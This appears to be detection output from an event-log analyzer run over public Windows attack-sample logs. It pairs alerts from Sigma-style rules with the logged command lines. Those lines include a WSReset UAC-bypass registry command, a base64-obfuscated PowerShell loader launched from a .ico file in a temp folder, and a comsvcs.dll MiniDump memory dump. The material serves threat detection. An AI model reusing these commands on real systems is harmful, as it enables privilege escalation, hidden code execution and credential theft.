2019-08-04 19:16:31.609 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,rules/sigma/process_creation/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,rules/sigma/process_creation/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.441 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.643 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.712 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.396 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.439 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx
2019-09-01 21:04:22.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx
2019-09-01 21:04:22.908 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx
2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:04:58.463 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
